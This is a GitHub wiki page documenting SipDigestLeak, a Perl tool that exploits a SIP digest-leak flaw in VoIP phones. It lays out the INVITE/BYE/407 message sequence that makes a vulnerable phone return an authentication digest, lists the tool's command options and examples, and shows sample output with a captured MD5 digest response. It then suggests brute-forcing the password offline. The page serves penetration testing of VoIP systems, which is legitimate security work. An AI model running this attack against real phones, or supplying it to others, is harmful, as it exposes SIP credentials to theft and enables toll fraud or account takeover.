Skip to content

SIPDigestLeak

Jose Luis Verdeguer edited this page Mar 8, 2019 · 5 revisions

SipDigestLeak exploits the vulnerability discovered by Sandro Gauci that affects a large number of hardware and software devices. The description of the vulnerability is here: https://resources.enablesecurity.com/resources/sipdigestleak-tut.pdf

The goal is to make a call to a telephone device (by a INVITE message). When in the other side someone answer the call, there will be no audio and then he or she will hang up. Then we will receive a BYE message. Next we will send a 407 proxy authentication required. If the telephone device is vulnerable, it will response with another BYE message that will include an authentication response.

Having the response we can try to obtain the password by a bruteforce attack on our local machine.

Script                                                         Phone
      ---> INVITE                                          ---> 
      <--- 100 Trying                                      <---
      <--- 180 Ringing                                     <---
      <--- 200 OK                                          <---
      ---> ACK                                             --->
      <--- BYE                                             <---
      ---> 407 Proxy Authentication Required (with digest) ---> 
      <--- BYE (with digest response)                      <---

Usage

$ perl sipdigestleak.pl

SipDigestLeak - by Pepelux <pepeluxx@gmail.com>
-------------

Usage: perl sipdigestleak.pl -h <host> [options]
 
== Options ==
-f  <string>     = From user (default: 100)
-fn <string>     = From name (default blank)
-t  <string>     = To user (default: 100)
-p  <integer>    = Remote port (default: 5060)
-ip <string>     = Source IP (default: local IP address)
-ua <string>     = Customize the UserAgent
-sd <filename>   = Save data in format of SIPDump file
-v               = Verbose (trace information)
 
== Examples ==
$ perl sipdigestleak.pl -h 192.168.0.1
$ perl sipdigestleak.pl -h 192.168.0.1 -p 5080 -v
\$ perl $0 -h 192.168.0.1 -sd data.txt
\$ perl $0 -h 192.168.0.1 -f 666666666 -fn Devil

Example

$ perl sipdigestleak.pl -h 192.168.1.127
[+] Connecting to 192.168.1.127
[+] Sending INVITE 100 => 100
[-] 100 Trying
[-] 180 Ringing
[-] 200 OK
[+] Sending ACK
[+] Waiting for the BYE message
[-] BYE received
[+] Sending 407 Proxy Authentication Required
[-] Auth: Digest username="testuser", realm="asterisk", nonce="treu3t1u", uri="sip:100@192.168.1.129:58134;transport=udp", response="c903022ba520f48292c24ddb376ba8a4", algorithm=MD5
You can’t perform that action at this time.